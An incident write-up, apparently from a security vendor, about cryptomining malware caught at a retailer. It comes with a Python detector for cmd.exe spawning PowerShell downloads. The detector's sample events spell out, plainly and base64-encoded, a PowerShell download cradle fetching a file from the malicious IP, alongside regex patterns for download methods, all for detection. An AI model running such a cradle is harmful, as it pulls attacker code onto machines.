Cryptomining via PowerShell Caught at Retailer
The Netsurion EventTracker SOC (Security Operations Center) reviews billions of logs daily to keep its customers safe from advanced threats. The SOC detected malware that had bypassed the customer’s traditional anti-virus (AV) software. Cryptomining malware infects workstations and laptops to create botnets that run computationally intensive algorithms in the background at unsuspecting companies.
The SOC analyst used the advanced logic in EventTracker SIEM to detect a suspicious command in which cmd.exe invoked PowerShell to download a suspicious file from http://220.127.116.11:80/a using Internet Explorer. Malicious use of PowerShell is often not detected or stopped by traditional endpoint defenses, because files and commands are not written to disk. Cryptomining impacts system performance, consumes power, and can be the doorway to other nefarious activity, such as stealing credentials or sensitive data to monetize.
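The pattern described above, as an added Python example that is not EventTracker's rule logic or code from the original page: it flags process-creation events where cmd.exe launches PowerShell with a download call, decodes `-EncodedCommand` payloads before matching, and raises severity when the URL host is a raw IP address. The event field names, host names and command lines are constructed for illustration; only the URL comes from the page.

```python
import base64
import re
from urllib.parse import urlsplit

SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD = re.compile(r"net\.webclient|download(string|file|data)|invoke-webrequest"
                      r"|invoke-restmethod|start-bitstransfer", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
ENCODED = re.compile(r"-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)
RAW_IP = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def expand(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: fall back to the raw text

def assess(event):
    """Return a finding for cmd.exe -> PowerShell download activity, else None."""
    if basename(event["parent"]) != "cmd.exe" or basename(event["image"]) not in SHELLS:
        return None
    text = expand(event["cmdline"])
    if not DOWNLOAD.search(text):
        return None
    urls = URL.findall(text)
    raw_ip = any(RAW_IP.fullmatch(urlsplit(u).hostname or "") for u in urls)
    return {"host": event["host"], "urls": urls, "severity": "high" if raw_ip else "medium"}

# Constructed events; field names are assumptions modelled on process-creation logs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD, EXPLORER = r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe"
FETCH = "(New-Object Net.WebClient).DownloadString('http://220.127.116.11:80/a')"
EVENTS = [
    {"host": "WS-01", "parent": CMD, "image": PS, "cmdline": f'powershell -nop -c "{FETCH}"'},
    {"host": "WS-02", "parent": CMD, "image": PS, "cmdline": "powershell -enc "
        + base64.b64encode(FETCH.encode("utf-16-le")).decode()},
    {"host": "WS-03", "parent": CMD, "image": PS, "cmdline": "powershell Get-ChildItem C:\\Temp"},
    {"host": "WS-04", "parent": EXPLORER, "image": PS, "cmdline": f'powershell -c "{FETCH}"'},
]

def findings(events=EVENTS):
    return [f for f in map(assess, events) if f]
```

Restricting the match to a cmd.exe parent mirrors the incident described here; a production rule would also need to consider other parent processes and allow-list known administrative scripts.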